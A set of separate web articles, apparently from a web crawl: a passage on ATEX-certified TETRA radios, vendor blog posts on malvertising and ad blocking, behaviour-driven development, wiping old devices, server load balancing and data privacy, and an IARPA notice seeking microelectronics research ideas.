Receiving a signal in the radio does not necessarily cause any major challenges from an ATEX perspective, however when transmitting voice or data from the radio, some of the internal components can generate heat. This in turn can raise the temperature on the outer skin of the radio - and the hotter the surfaces of the radio, the higher the risk of ignition of a gas or dust.
With more efficient RF design, higher transmission power can be achieved without raising the temperature of the radio. The challenge for TETRA has been creating a radio than can transmit at the same power levels as non-ATEX radios. The ETSI standard defines transmit power in “Class” levels – for example a Class 4 radio has a nominal Tx power of 1W, but the actual definition is 30 dBm +/- 2dB, allowing some design flexibility and manufacturing tolerance. For most modern non-ATEX radios the Tx power is aligned to the higher end of this tolerance – i.e. above 1W, however for ATEX radios the actual measured Tx Power of a Class 4 radio is less than 1W – often around 0.7W. This is driven by the need to limit maximum currents in the radio and to limit heating effects.
This obviously impacts the ability for a radio to operate in poor coverage areas of a facility and can result in ‘dead spots’ where communication is lost altogether. Thus the challenge for ATEX radios is how to enable improved coverage through higher transmission power and a more optimised system design, ensuring users are always connected, can hear all messages broadcast and can respond in all emergencies.
RUGGED FOR A TOUGH ENVIRONMENT
Many ATEX environments are found in the extremes of the planet. From the dust and heat of the Middle East, where temperatures regularly exceed 45C, to the cold and wet of Siberia where temperatures can drop below -20C with snow and ice. This drives the need for radios to operate in the most extreme environments, maintaining ATEX performance levels despite exposure to heat shock or extreme cold, as well as dirt, oil, metal dust and chemicals.
We also see ATEX radios deployed by numerous fire services as they will often be required to respond to situations where the risk of exposure to flammable materials and ignition from their equipment is very real. This is further exacerbated by the need to withstand exposure to multiple water sources. This results in the need for equipment to be able to provide multiple levels of IP protection, even after thermal cycling, heat shock and drop testing.
An ATEX radio communications solution does not stop at the radio. There are a wide range of user requirements when it comes to accessories. Most are tailored for use in a particular environment and this has resulted in a wide array of accessories required by the numerous ATEX users: remote speaker mics; skull mics; boom mics; noise cancelling headsets; hardhat solutions; smoke diver face masks; earpieces; and large Push-To-Talk buttons. This drives the requirement for advanced interoperability between multiple types of accessories and the radio itself to satisfy all types of users.
USABILITY AND ERGONOMICS
A significant number of user groups operating in ATEX environments will be wearing gloves and possibly masks, helmets and other protective clothing when using their communications equipment. This means the radio and accessories need to be optimised for use by people who may have reduced tactility in their fingers, possibly restricted vision, and almost without exception, are working in a loud ambient noise environment. This drives design considerations to ensure users can continue to communicate regardless of potentially major restrictions to their normal senses.
A further aspect of usability is the duration of radio use between charges. Some users will be required to operate long distances from a charger or suitable power source and this encourages a need for extended usage time beyond an average shift of eight hours.
These five key requirements demonstrate the extraordinary technical challenges in delivering communications equipment which not only meet end user needs, but also comply with the ATEX and IECEX standards. The MTP850Ex TETRA ATEX radio has demonstrated, time and again, that it meets these extraordinarily tough technical needs with more than 100,000 radios already shipped to customers.
Mark La Pensee, Head of TETRA Subscribers, Product Management
Mark is on LinkedIn at https://uk.linkedin.com/pub/mark-lapensee/0/a13/7b9
Follow @MotSolsEMEA and #CCW2015 on Twitter.
Join the Motorola Solutions Community EMEA at | <urn:uuid:67f851c7-fc73-4810-ae2d-7400db68997c> | CC-MAIN-2022-40 | https://www.motorolasolutions.com/en_xu/communities/en/think-oil-gas.entry.html/2015/05/08/five_key_elementsto-Xesd.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00566.warc.gz | en | 0.923983 | 1,461 | 2.515625 | 3 |
Online advertising is certainly divisive, often disruptive and sometimes malicious for people browsing the internet, but conversely it supports publishers and the free online content that we have come to rely on. While everyone has an opinion about these often-annoying ads that follow us as we browse or pop up when we try to read an article online, not all ads are created equal. Some are even helpful when searching for items to purchase, later finding out they are on sale through targeted ads that remember us and our browsing history. However, many are badly designed, intrusive, and in some cases, harmful to users. Privacy issues aside, users should be aware of an even bigger issue – malvertising. Simply put, malvertising is the use of online advertising to spread malware to our devices.
In this blog we’ll discuss the most common questions that arise around the issue of ad blocking and malvertising and why simply blocking ads isn’t enough to protect your privacy and your personal data.
Ad blocking or ad filtering utilizes various technologies to block the delivery or exposure to advertising.
Online advertising exists in many forms, such as banners, pictures, pop-ups, animations and embedded audio and video. Ad blockers target and block these ads allowing users to browse the internet without interruption or distraction. All browsers offer ways to alter or remove ads, either by targeting technologies that are used to deliver them, URLs that are the source of the ad or by targeting behavioural characteristics.
Why Should I Block Online Ads?
Aside from being generally annoying and disruptive, online ads can be malicious. Many ads that appear on credible and popular websites today contain malvertising. Because these seemingly innocent ads are often delivered by credible publishers’ people often don’t hesitate to click on them, thus infecting their desktop or mobile device with malware. The primary publisher of a site often subscribes to ten or more ad delivery / profiling companies at any one time. Since they provide links to these third-party servers, they have no idea what is being delivered by these services. As a result, it is relatively easy for bad actors to insert seemingly innocent looking ads onto these sites which may hide more sinister behaviour. Often these third-party services also aggregate and share information with each other enabling them to build a detailed profile on each user accessing the site.
By blocking ads, you can help protect yourself from malware and data profiling activities.
What is Malvertising and how Does it Work?
Malvertising has been a popular technique with cybercriminals for over 10 years, with the first documented attack occurring back in 2007 when bad actors abused an Adobe Flash campaign targeting visitors on sites such as MySpace. Cybercriminals use a variety of approaches but malvertising continues to be a popular technique to prey upon unsuspecting users. These malicious ads look like any other ad and can be found on any website, in fact, larger and more popular websites are most often targeted due to the level of trust and exposure of the publication.
Publishers rely on third party vendors and software to schedule, track and display online ads to generate revenue. The advertising inventory is then sold to potential advertisers who then have then ability to upload their ads, because space is typically allocated by a bidding system, the cost for cybercriminals can be quite low. Publishers and third-party vendors are aware of the risks of malvertising and attempt to filter them out. Conversely, criminals are aware of the methods used to detect them and focus on creating ads that avoid detection. These ads typically focus on duping a user into clicking a link to trigger the download, or the attacker uses a drive-by download technique to expose the user to malicious content. The malicious code is then used to steal the user’s data or infect the device with ransomware or latent malware such as a RAT (Remote Access Trojan).
How can Malvertising Harm me?
Cybercriminals are relentless in their pursuit of easy financial gain and malvertising is a tried and tested technique which allows them to access your personal and/or corporate data. Your data has value and a price and is often later sold to criminals on the Dark Web. In addition to stealing your personal information, cybercriminals can also infect your device with a virus, delete information, hijack your device, engage in crypto-jacking or even spy on you using the microphone and camera. We also can’t ignore the issue of ransomware, a form of malware that locks you out of your device and forces you to pay a ransom to regain control. Witness the devasting effects of such attacks in local governments that were forced to pay over US$500k to regain control of their systems.
Is Malvertising More Dangerous on a Smartphone?
Unfortunately, it is easy to accidently tap an ad on a smartphone. People often fall prey to malicious ads when playing a game on their mobile device, tapping a screen in the game and accidently tapping a strategically placed malicious ad. Malvertisements don’t differentiate between intentional and unintentional clicks, so once clicked the malware is being loaded. As more of us depend on our mobile device for everyday activities like shopping and online banking they are becoming a more attractive form factor for cybercriminals, especially as users typically have no protection installed to mitigate these risks.
What is the Best Free Ad Blocker?
There are many different free products available for download, AdBlock and AdBlockPlus are popular options.
What is the Safest Ad Blocker?
There are many options available but AdBlock and AdBlock Plus are often referenced as the better solutions in the free category. However, like most things, you get what you pay for. You may need 4 or 5 browser plugins to protect you from the various types of network attacks. Even then, you will only have protection on your browser, not the rest of your device, allowing rogue applications and other system based malware to infect your device.
Commercial solutions, such as BlackFog Privacy, offer a broader array of protection, against not only malvertising, but privacy, crypto-jacking, profiling and the Dark Web to name a few. In addition, BlackFog will monitor the collection of data in real-time and stop the outbound flow of data to ensure that no unauthorized data ever leaves the device. You can download a free trial on blackfog.com for iOS, Android, Mac and Windows.
Will Free Ad Blockers Slow Down my Browser?
Yes, in most cases users will notice a change in their browser speed when using an ad blocker because they rely on the browsers built-in scripting technology. Other techniques, such as those employed by BlackFog, operate at a much lower level. BlackFog operates on the network layer of the operating system and therefore offers much greater performance and works across every application on your machine, not just a browser. As a result it is able to provide broader protection not just against ads, but 12 layers of defense against ransomware, spyware, phishing, unauthorized data collection and profiling. This will subsequently increase your browsing speed and page load times by more than 200%.
While Ad blocking itself is not illegal there is some debate around this issue and legalities may vary by country. In 2018 the company behind Adblock Plus won an important, highly publicized legal victory in Germany. The German supreme court ruled that AdBlock Plus is not breaking the competition law by charging publishers for inclusion on its whitelist. You can read more about the legalities of ad blocking in this article.
As with most applications you install for the first time you are likely to see a notification like this, “AdBlock can read, modify, and transmit content from all web pages. This could include sensitive information like passwords, phone numbers, and credit cards.” Whilst this is fairly standard it is recommended that users add an extra layer of security to their devices. A privacy solution that monitors the flow of outbound data from your device to prevent data profiling and unwanted data collection will ensure that your personal data is secure.
Yes this is a free product.
Is There an Ad Blocker That Can’t be Detected?
The short answer is, yes. For now. Technology is constantly changing, and it is a constant game of cat and mouse with ad vendors and ad blockers. Some products are less likely to be detected by virtue of the way they operate.
Ad Blockers can typically be detected by websites if desired. Since they operate at the browser level and use scripting to read a web page it is relatively easy to detect if a site has been modified by such a tool. New techniques are constantly being developed to work around the detection, but it is very difficult given the way they operate.
Software such as BlackFog Privacy, uses a different technique. Since it operates at the network layer it is less likely to be detected by anti-adblock techniques. Because it does not technically modify the page content the site is not able to detect any change and therefore can run undetected. In addition, by using outbound data blocking it is able to monitor all callbacks.
What are Some of the Main Reasons for Blocking Ads?
- Privacy protection
- Malvertising protection
- Reducing the number of HTTP cookies
- Protection from intrusive ads and pop ups that often lead users to scam sites
- Fewer distractions
- To save battery on mobile devices
- Better user experience
- Less cluttered pages
- Faster content loading
- Prevent undesirable websites from making ad revenue out of the user’s visit
How can I Prevent Cybercriminals from Stealing my Data?
Hackers are going to get in, that’s inevitable. Cybercrime pays and criminals are getting smarter. The good news is that there is technology available to stop them in their tracks. BlackFog is able to spot attackers in real-time when an attacker has infiltrated the system, so hackers are prevented from removing any of your data, so even if you click on a malicious ad your data and device won’t be compromised.
What Else Should I do to Protect my Privacy When Browsing Online?
Every application you use or website you visit collects information about what you’re doing, and users are giving away unauthorized data every time they go online. Online advertising which can be ‘malvertising’ is certainly a threat that users need to be aware of but it’s only part of the modern threat landscape. Rather than focussing solely on blocking ads users should also block the exfiltration of data. A proactive solution like BlackFog Privacy can prevent unwanted data collection and profiling whilst also blocking 99% of online advertising.
In conclusion, blocking ads will enhance a user’s online experience and help to provide important protection from a specific attack vector. However, it is important to emphasize that the threat landscape we see today is infinitely more sophisticated than just a few years ago. Individuals need to adopt a multi-layer defence system to protect their privacy, prevent data loss and put a stop to unauthorized data profiling and data collection. Deploying a solution that blocks outbound data flow will ensure that no unauthorized data ever leaves your device. | <urn:uuid:d24e3727-cc2d-4452-a78d-6a3bf17b4caf> | CC-MAIN-2022-40 | https://www.blackfog.com/what-you-need-to-know-about-ad-blocking-and-malvertising/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00566.warc.gz | en | 0.940948 | 2,277 | 2.84375 | 3 |
Widely known in the tech world by its abbreviation BDD or by the nickname “Specification by Example”, Behavior-Driven Development is generally defined as “a methodology for developing software through continuous example-based communication between developers, QAs, and BAs.” Created by a man named Dan North, BDD is his answer to the frustration of not being able to explain clearly when developers wanted to know where to start, what not to test, how much to test, what to call the tests, and how to understand why a test fails. Stemming from Test Driven Development (TDD) and Acceptance Test-Driven Development (ATDD), this methodology is used to bring agility, concrete communication, and a shared understanding of objectives between teams, technical and non-technical.
Essentially the collaborative process of describing, in a very direct example-driven way, a set of behaviors that can be expected from a system–ultimately, the outcome is that all stakeholders are able to have powerful conversations about what the software should do. On top of that, when implemented correctly, everyone in all teams will understand the functionality of deliverables without confusion and be able to identify key results before the development process even begins. In the following article, we will explore the ins and outs of BDD as well as examples of how to implement it into your organization’s software development management methodology.
Acceleration of TDD and ATDD through BDD
In order to understand BDD, you must first be introduced to the meanings of TDD and ATDD as well as how they are used. Following that, you must then understand how BDD accelerates these two methodologies by combining their basic principles into one powerful software development process.
TDD “refers to a style of programming in which three activities are tightly interwoven: coding, testing (in the form of writing unit tests), and design (in the form of refactoring).” When this methodology is in use, a developer must first define a test set for a specific unit, then purposely make it fail, then deploy the unit, followed by defining if the unit was a success. A very key part of the success of BDD, a programmer should know and work within the TDD structure before learning or implementing BDD.
ATDD “involves team members with different perspectives (customer, development, testing) collaborating to write acceptance tests in advance of implementing the corresponding functionality. The collaborative discussions that occur to generate the acceptance test is often referred to as the three amigos – representing the three perspectives of customers (what problem are we trying to solve?), development (how might we solve this problem), and testing (what about…).” Each test within this methodology should be written in a “given, when, then” style or if-then format, like below:
Given [initial context]
When [event occurs]
Then [ensure some outcomes]
With the first focus on reducing overall development time as well as the number of bugs found via tests on all requirement levels and stronger codebases, the second focus zeroes in on simplifying communication via a Domain-Specific Language format and the interworking of every end result perspective, when combined we get BDD. Now, taking what we know from above–that BDD is an example-driven communication methodology used to talk about application behaviors–at its core, BDD basic principles use the conversation structure that even non-developers can understand from ATDD in conjunction with a narrowed down TDD testing focus aimed at behavior specifics that are best described in business-driven logic.
The 2 Basic Principles
1. User Stories
Plain language written scenarios that describe the intent, the who, and the what should happen in order to achieve the requirements of the unit. Within BDD, User Stories need to be very specific and always in whole sentences including the name/feature. When introducing the method, Dan North stated that “Developers discovered it could do at least some of their documentation for them, so they started to write test methods that were real sentences. What’s more, they found that when they wrote the method name in the language of the business domain, the generated documents made sense to business users, analysts, and testers.” Ideally using the word “should” and in an if-then format, BDD technically calls for no specific scenario format. However, many experts, including Dan, suggest that your organization work with one standardized format. That way teams can modify, explore, and expand without any issue, now and in the future.
Dan North’s User Story Format
Title (one line describing the story with should)
As a [role] I want [feature] So that [benefit]
Acceptance Criteria: (presented as Scenarios)
Scenario 1: Title
Given [context] And [some more context]…
When [event] Then [outcome] And [another outcome]…
Scenario 2: …
To help you better understand how it looks, with slight variations of format, here is an API test example taken from Guru:
Feature: Test CRUD methods in Sample REST API testing framework
Given I set sample REST API URL
Scenario: POST post example
Given I Set POST posts API endpoint
When I Set HEADER param request content type as “application/JSON.”
And Set request Body
And Send a POST HTTP request
Then I receive valid HTTP response code 201
And Response BODY “POST” is non-empty.
Scenario: GET posts example
Given I Set GET posts API endpoint “1”
When I Set HEADER param request content type as “application/JSON.”
And Send GET HTTP request
Then I receive valid HTTP response code 200 for “GET.”
And Response BODY “GET” is non-empty
Scenario: UPDATE posts example
Given I Set PUT posts API endpoint for “1”
When I Set Update Request Body
And Send PUT HTTP request
Then I receive valid HTTP response code 200 for “PUT.”
And Response BODY “PUT” is non-empty
Scenario: DELETE posts example
Given I Set DELETE posts API endpoint for “1”
When I Send DELETE HTTP request
Then I receive valid HTTP response code 200 for “DELETE.”
2. Common Languages
As we have stated numerous times throughout this article, and can not stress enough, BDD relies heavily on the use of language that every member of your team can understand. Domain-Specific Language (DSL) is what makes each scenario readable by business partners, the ones who are commissioning the software and tests in the first place, wanting a specific behavior to occur. It works to remove the need to explain, on both technical and non-tech ends, how a behavior is implemented and in return makes less confusion throughout the process.
In order to maximize time and outcomes, BDD is supported by tools that automate tests. Closely linked to the DSL that is defined by your organization, these tools include Cucumber, which can understand Gherkin while supporting writing specifications for 30 spoken languages. When in use, such tools automatically execute common language specifications.
Launch Behavior-Driven Development In Your Organization
No matter where your organization is in its software development management journey–using agile methods, waterfall, or something else–implementing this methodology yields a higher gain than risk value. If the use of the method does not suit your needs, you can simply go back to writing test requirements the way you have been doing it. There is no undoing anything.
To begin, first, ensure your developers are working within and understand TDD. If they are not, they will need to start a training period to develop skills within this style of programming. Once your developers are on board, you can implement the basics of BDD to your entire organization. Again, a training period will need to take place. During this time Developers, QA, and BA teams need to be taught how to read and understand your chosen DSL and documentation method. Start with just one project to see how it all works is best. Be aware that this methodology requires specifications before development and constant outside feedback from users, customers, and domain experts. However, when implemented successfully, you will reduce regression and improve goal communication. | <urn:uuid:accc2501-8577-4856-9708-60bdc9592b08> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/behavior-driven-development-bdd/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00566.warc.gz | en | 0.927261 | 1,774 | 3.59375 | 4 |
When you think about it, the lifecycle of our devices is pretty short. Within a few years of getting a new phone or tablet, for example, we’re often tempted to upgrade to newer, faster models. A common problem with this is that we sometimes forget about the wealth of personal information stored on our devices, and how easy it would be for someone to potentially access our data.
Anything from old text messages and emails, to photos, logins and more could fall into the wrong hands if your device is not wiped clean. That’s why it’s important to take the following precautions before getting rid of old devices.
For most devices, there are two essential steps you need to take to protect your data: backup your information and then restore the device to its original state. Here’s how:
Android is the most popularly used mobile operating system in the world, so there are lot of old devices floating around. The process of backing up and restoring your phone can differ, however, depending on the manufacturer. Your best bet is to do a web search for instructions on your specific device, but the options for backing up to Google Drive and restoring should both be in the Settings app.
Start with backing up your data to either Apple’s iCloud or iTunes via your computer. Here are step-by-step instructions for backing up to iCloud, and removing your information for iPhones, iPads and iPod Touch devices.
To backup to iTunes, connect your device to your computer and launch the iTunes app. Select “Device” near the top-left corner of your screen, right-click and select “Backup.”
Next, delete the data on of your old device by opening up the Settings app, selecting “General” and scrolling down to “Reset.” From here, hit “Erase all contents and settings.”
Lost or Stolen Smartphones
If you have taken the precaution of downloading software like McAfee Mobile Security (MMS) on your Android or iOS device, you can remotely backup and then erase the data on your device, even after it has been lost or stolen. And, if you have a “jailbroken” iOS devices you will be able to backup all your data, since an iTunes backup may not include all the data in apps that were not approved by Apple.
Computers & Laptops
First, delete any files or applications you no longer use, and empty your trash. Erase your browser history, and logout of your browser if you are logged in. This ensures that your searches, and any stored usernames and passwords are erased.
Then, backup your files either to an external hard drive or cloud service such as Google Drive, or Apple’s iCloud. From there you can easily transfer your files to a new laptop or computer.
Once you have saved your personal information, you can start the process of scrubbing your old machine clean. Start by deleting sensitive files, such as tax returns and financial documents. We recommend you use specialized tools such as McAfee Shredder, included in all McAfee security suites, or File Shredder. These military-grade options ensure that your files cannot be restored after they are deleted.
Then, you can wipe the drive and restore it. This will erase all the remaining data on the drive, and reload the operating system so someone else can use it.
If you have a PC, you might want to use a free program to wipe the drive, following the instructions they offer online.
If you have a Mac, you can erase OS X and reinstall it by following these tips.
We know what you’re wondering: “printers store information too?” They do, if they have a scanning function. The pages or images you have scanned are sometimes stored in the printer’s internal memory and someone who knows what to look for could potentially access them.
There are a couple ways to keep someone from retrieving your information. First, try unplugging your printer for a while since it will delete data if it has no local storage. But, if it has a disk drive feature you’ll need to wipe it clean by going to your settings menu. Of course, you can always find and destroy the drive with the hammer if the printer will no longer be used, but remember to wear protective eyewear!
Lastly, if you are not giving away or selling your old devices, make sure you recycle them properly. You can contact a local e-recycling center, or, if you have an iOS device you may be able to send them back to Apple for recycling.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:adc010ea-bc22-41b0-96fb-19bc77e7eab2> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/privacy-identity-protection/getting-rid-old-devices-say-goodbye-lingering-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00566.warc.gz | en | 0.929583 | 1,001 | 2.625 | 3 |
Server Load Balancing Definition
Server Load Balancing (SLB) is a technology that distributes high traffic sites among several servers using a network-based hardware or software-defined appliance. And when load balancing across multiple geo locations, the intelligent distribution of traffic is referred to as global server load balancing (GSLB). The servers can be on premises in a company’s own data centers, or hosted in a private cloud or the public cloud.
Server load balancers intercepts traffic for a website and reroutes that traffic to servers.
What is Server Load Balancing?
Server Load Balancing (SLB) provides network services and content delivery using a series of load balancing algorithms. It prioritizes responses to the specific requests from clients over the network. Server load balancing distributes client traffic to servers to ensure consistent, high-performance application delivery.
Server load balancing ensures application delivery, scalability, reliability and high availability.
How does Server Load Balancing Work?
Server load balancing works within two main types of load balancing:
• Transport-level load balancing is a DNS-based approach which acts independently of the application payload.
• Application-level load balancing uses traffic load to make balancing decisions such as with windows server load balancing.
What are the Advantages of Server Load Balancing?
Distributing incoming network traffic through web server load balancers across multiple servers aims to increase efficiency of application delivery to end users for a reliable application experience. IT teams are increasingly relying on server load balancers to:
• Increase Scalability: load balancers are able to spin up or down server resources based on spikes in traffic to the pool of servers that are best suited to handle these increases in traffic and keep applications performance optimized.
• Redundancy: Using multiple web servers to deliver applications or websites provides a safeguard against the inevitable hardware failure and application downtime. When server load balancers are in place they can automatically transfer traffic to working servers from servers that go down with little to no impact on the end user.
• Maintenance and Performance: Business with web servers distributed across multiple locations and a variety of cloud environments can schedule maintenance at any time to improve performance with minimal impact on application uptime as server load balancers can redirect traffic to resources that are not undergoing maintenance.
What is the Difference Between HTTP Server Load Balancing and TCP Load Balancing?
HTTP server load balancing is a simple HTTP request/response architecture for HTTP traffic. But a TCP load balancer is for applications that do not speak HTTP. TCP load balancing can be implemented at layer 4 or at layer 7. An HTTP load balancer is a reverse proxy that can perform extra actions on HTTPS traffic.
Does Avi offer Server Load Balancing?
Yes. Avi Networks delivers modern, multi-cloud load balancing, including an entirely innovative way of handling local and global server load balancing for enterprise customers across the data center and clouds.
This capability delivers:
• Active / standby data center traffic distribution
• Active / active data center traffic distribution
• Geolocation database and location mapping
• Consistency across data centers
• Rich visibility and metrics for all transactions
For more on the actual implementation of load balancers, check out our Application Delivery How-To Videos.
For more information on server load balancing see the following resources: | <urn:uuid:8ae15533-3216-4689-b231-048d816cb1c7> | CC-MAIN-2022-40 | https://avinetworks.com/glossary/server-load-balancer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00766.warc.gz | en | 0.848832 | 683 | 3.34375 | 3 |
Data privacy is subjective and complicated, but it definitely does matter – and more so every year as cybersecurity threats increase and a federal privacy law remains a pipedream in the United States.
“More and more data about each of us is being generated faster and faster from more and more devices, and we can’t keep up. It’s a losing game both for individuals and for our legal system. If we don’t change the rules of the game soon, it will turn into a losing game for our economy and society,” says Brookings Institution global thought leader on privacy, AI and cross-border challenges in information technology, Cameron F. Kerry.
The IAPP defines data privacy as, “the right to have some control over how your personal information is collected and used.” But why does control matter? What’s the big deal if a company knows your name and address because they sent you the parcel you ordered? Or if Big Tech can track you across web sites and build a profile of you based on your browsing history?
We’ll give you 9 good reasons why data privacy matters.
1. Privacy is a fundamental human right.
Privacy is addressed in all the major human rights instruments, including the United Nations Declaration of Human Rights 1948, Article 12, and in the constitutional statements of around 130 countries. Protecting your fundamental right to privacy means you can:
- limit others’ control over you, to know about you and to cause you harm
- better manage your professional and personal reputations
- put in place boundaries and encourage respect
- maintain trust in relationships and interactions with others
- protect your right to free speech and thought
- pursue second chances for regaining your privacy
- feel empowered that you’re in control of your life.
2. Web sites and services collect personal data about you — much of it highly sensitive.
Unsurprisingly, every company in business wants to sell you their products and services. To have the best chance of landing the sale, they want to know as much information about you as possible so they can personalize ads (more on that later) and target their sales push.
But a lot of the personal data that web sites and services collect includes some of the most personal and highly sensitive information you possess, including your name, SSN, home address, telephone numbers, what property you own, login details, personal opinions posted anywhere, criminal records, life events such as divorce, and every single purchase you make.
This data tracking and collection is called surveillance capitalism, which drives what’s known as the data economy. Professor Emerita Shoshana Zuboff of Harvard Business School first defined surveillance capitalism as, “the unilateral claiming of private human experience as free raw material for translation into behavioral data. These data are then computed and packaged as prediction products and sold into behavioral futures markets — business customers with a commercial interest in knowing what we will do now, soon, and later.”
3. Businesses use the personal data to personalize ads and online experiences.
Personalized ads rely on the invasive surveillance of your personal data we’ve just covered. And while it’s true that some consumers want a personalized online shopping experience because it might save time and money and enhance their online experience, it’s also true that, increasingly, consumers don’t want personalization or hyper-personalization when it comes at the expense of their privacy. Only 21% of US consumers want apps to track them across the internet for targeted advertising under Apple’s new App Tracking Transparency (ATT) feature, for instance.
The ad personalization process known as real-time bidding is fraught with significant data privacy issues:
- Hundreds of businesses get access to a user’s data
- Most anyone can participate in process, and while there are penalties for misusing bid stream data, parsing the data is still highly valuable to participants.
- Bid stream data can be harvested even without third party cookies so recent efforts by Apple and Google to ban third party cookies do nothing to mitigate the privacy risks.
- The bid stream data is usually anonymized but it’s relatively easy to match a user to their information.
- Data brokers readily package the bid stream data (particularly valuable location data) and sell it to other businesses and even governments with little oversight.
4. Businesses also use personal data to set higher prices, control the content you see, and influence your purchasing and even political decisions.
Every action you perform online has become a piece of data which is used to coerce and constrain your digital experiences. You see it in the ads that show up across all your devices after an Internet search, in the ever-narrower set of content you’re shown on your social media sites, and in the increasingly compelling, and sometimes spooky, product recommendations you receive.
Web sites and services track your behavior, particularly your repeated behavior, such as frequent location, hotel and flight searches, and use the data to increase the price at a future date since they know you are interested and more likely to make a purchase.
And of course the Facebook Cambridge Analytica scandal is a great case study of how personal information can be breached and used to influence political decisions.
The cherry on top for businesses is they can use all this consumer data to improve their own product offerings and supply chains.
5. Data brokers are worse than the companies who collect the data.
Data brokers aggregate and package up personal data and sell it for huge profit too.
Data brokers are businesses that harvest, manipulate and even misrepresent consumer data and sell it to businesses, usually for marketing purposes. Data brokers are legitimate but unregulated businesses, there are about 4,000 of them worldwide, and their industry is worth about US $200 billion annually.
Many of the brands and businesses that you interact with and buy from see your data as an additional lucrative product they can sell to others for profit. Around 1,500 leading brands sell the data from their customer loyalty programs, and that data can go into many different databases. Some of these brands are Google and Facebook, and even banks.
Once data brokers have the information, they sell it, usually in list form. Your email address on a list of people with a particular medical condition such as diabetes would be worth about $80 and on a list of a particular class of traveler about $250.
6. Even governments can see what you are doing online.
Governments do request access to personal data held by the private sector, and it’s the subject of much regulatory debate and consumer concern. In 2019 66% of US adults said they believe they face more potential risks than benefits from government data collection.
The OECD says, “Unlimited government access to personal data held by the private sector, including for stated national security reasons, negatively impacts trust in the digital economy, creating uncertainty with adverse market effects,” but acknowledges that “data flows across borders are integral to the global digital economy and a necessary input for reaping the benefits of digitalisation.”
The ideal is to put in place appropriate governance and safeguards for trusted governments access to personal data held by private entities, which is on the OECD’s agenda.
7. Some businesses use dark patterns to maximize the data they gather.
Dark patterns are intentional user experience features of websites and apps designed to make it harder for you to do what you want, either through complexity or deception.
Think of dark patterns as traps to get more of your personal information and to tempt you into buying products and services.
The motivation for trapping users online is profit, either directly through a purchase or indirectly through data sharing, which is at the root of surveillance capitalism as we said. The more information a brand has about its users, the better they can target their audiences with tailored content in the hope they’ll buy.
Find out more about common dark patterns.
Australia’s Competition and Consumer Commission also just pointed out that the lack of choice in device settings such as a pre-installed search engine (by the all-powerful Google) is another way tech giants quietly assume control over consumer data.
8. Stored personal data can be caught in a data breach.
A data breach is a security event where highly sensitive, confidential or protected information is accessed or disclosed without permission or is lost. Organizations, governments and individuals can be victims of data breaches, and usually these events are enormously costly in terms of time, money or corporate reputation.
To give you an idea of the size and scale of some data breaches, 3.5 billion people had records exposed in the 15 biggest data breaches of this century. In just the first half of 2019, data breaches exposed 4.1 billion records.
Data breaches can occur accidentally (e.g. someone inside an organization inadvertently accesses and views information, or devices containing sensitive information are stolen or lost) or purposefully (e.g. someone inside an organization purposefully accesses and/or shares information with malicious intent, or criminals use sophisticated means such as phishing emails, brute force attacks and malware to exploit weaknesses in networks or individual behavior). Read the top 5 security concerns this year.
As of 2019, the World Economic Forum put cyberattacks in the top five risks to global stability. Worldwide, more than 80% of cyberattacks come from phishing emails, which deliver 94% of malware. In the first six months of 2019, attacks on Internet of Things devices (one of the fastest-growing emerging technologies) tripled, and malware attacks that leverage applications already installed on a system (known as fileless attacks) increased by 256%.
Often victims of data privacy breaches aren’t aware they’re a victim or they find out too late, and they don’t know the person or company violating their right to privacy. Find out how a criminal carries out a data breach and what to do if you’re caught in one.
9. Criminals can use the stolen credentials to commit crimes like credit card fraud and identity theft. The dark web is thriving.
According to Deloitte in most cases, criminals won’t use the data themselves but are either engaged by a third party to obtain the data or plan to sell the information on the dark web. Buyers from the dark web may use the data for financial theft from credit cards, to create fake passports and identities, transfer money between accounts, resell stolen information at a higher price to the media, or other illicit activities.
The COVID-19 pandemic is worsening cybercrime.
What you can do to protect your data privacy
Anonyome Labs, the makers of MySudo, believes being private doesn’t mean opting out of online services or hiding from the world. We empower people to be able to determine what information they share, and how, when, where and with whom they share it.
MySudo is the world’s only all-in-one privacy app, full of privacy and security features. Download the app and then take 90 seconds to learn how to use it. Until data privacy is better protected by the companies who collect, the governments who access it, and the legal system, we all need proactive tools like MySudo. | <urn:uuid:9cf9acf1-1953-4567-a71f-897f2317ddc4> | CC-MAIN-2022-40 | https://mysudo.com/2021/11/9-reasons-why-data-privacy-matters/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00766.warc.gz | en | 0.938757 | 2,322 | 2.8125 | 3 |
IARPA wants “seedling” ideas that use a multidisciplinary approach that extends beyond traditional technological and scientific fields.
The intelligence community wants to take advantage of upcoming advances in machine learning and artificial intelligence but needs smaller, more powerful hardware to run those algorithms.
The Intelligence Advanced Research Programs Activity—the advanced research arm of the intelligence community—released a broad agency announcement in support of research into the next generation of microelectronics, including processors, semiconductors and other hardware technologies.
Researchers believe this will require a significant leap in technology and are looking for ideas from natural and social sciences, as well as art and other disciplines.
“The ability to implement AI and ML depends critically on computing models that today are limited with respect to data storage, data movement and data analysis,” the opportunity states. “Faster, more energy efficient and resilient computing requires that challenges including the physical limits on transistors, electrical interconnects, and memory elements be overcome.”
Research to date has focused on maximizing the use of existing processor chip technology. But IARPA scientists say the future will require new kinds of processors.
“To lay the foundation for long term advancements in computing technologies, a more unified approach encompassing research and development into the chemistry and physics of new materials, microelectronic devices and circuits, computing architectures and algorithm design is needed,” the notice states. “Materials scientists, chemists, and physicists, circuit designers, engineers, communications, runtime and memory architects, as well as algorithm designers and application coders must work across the historic boundaries that have separated these disciplines to achieve the next generation of highly complex systems.”
The research is in the earliest of stages, “which IARPA refers to as ‘seedlings.’”
